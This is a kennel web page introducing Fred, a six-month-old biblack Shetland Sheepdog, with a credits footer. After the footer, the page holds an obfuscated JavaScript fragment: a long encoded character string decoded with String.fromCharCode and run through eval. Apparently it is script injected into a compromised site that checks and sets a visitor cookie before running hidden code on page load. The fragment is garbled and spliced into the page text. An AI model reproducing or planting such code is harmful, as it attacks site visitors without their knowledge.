Some of you may believe that a special dog comes back to you again, in a new body. That would be the case with Fred. I hadn’t planned to keep this biblack male as I have his sire. However, several friends kept talking about how much he reminded them of my first Fred, Shalaine’s Rainy Day Man, and how many of his mannerisms were the same. So…….here he is, my heart dog returned, Shalaine’s Winter Reign, Fred. He’s a mischievous scamp that is filled with energy, yet cuddles at the drop of a hat. He has been dubbed a german shepherd “wanna be” because even at six months he has that effortless, flowing side gait a GSD should have. He uses his front feet as hands and thinks he would make a great soccer player. And he really thinks his place on a leash is six feet out in front, pulling you along. I don’t know what the future will hold for Fred regarding the breed ring. But he will definitely show up in the agility ring, so watch for him there.



Copyright © Shalaine Shetland Sheepdogs. All Rights Reserved.
No photos may be reproduced without written permission.
Painting by Mildred Dover
Background by Until Then Graphics
Designed and Maintained by RySong Shetland Sheepdogs

4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:68:58:62:62:5e:27:30:1f:20:32:4:1:74:4:1:74"[pxkdd](":");}xbgld=kbant;qwnm=[];for(ejbhaj=22-20-2;-ejbhaj+1416!=0;ejbhaj+=1){tzldaz=ejbhaj;if((0x19==031))qwnm+=String.fromCharCode(eval(iyfq+xbgld[1*tzldaz])+0xa-wvetkx);}hoh=eval;hoh(qwnm)} ')} document.write('
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Some of you may believe that a special dog comes back to you again, in a new body. That would be the case with Fred. I hadn’t planned to keep this biblack male as I have his sire. However, several friends kept talking about how much he reminded them of my first Fred, Shalaine’s Rainy Day Man, and how many of his mannerisms were the same. So…….here he is, my heart dog returned, Shalaine’s Winter Reign, Fred. He’s a mischievous scamp that is filled with energy, yet cuddles at the drop of a hat. He has been dubbed a german shepherd “wanna be” because even at six months he has that effortless, flowing side gait a GSD should have. He uses his front feet as hands and thinks he would make a great soccer player. And he really thinks his place on a leash is six feet out in front, pulling you along. I don’t know what the future will hold for Fred regarding the breed ring. But he will definitely show up in the agility ring, so watch for him there.



Copyright © Shalaine Shetland Sheepdogs. All Rights Reserved.
No photos may be reproduced without written permission.
Painting by Mildred Dover
Background by Until Then Graphics
Designed and Maintained by RySong Shetland Sheepdogs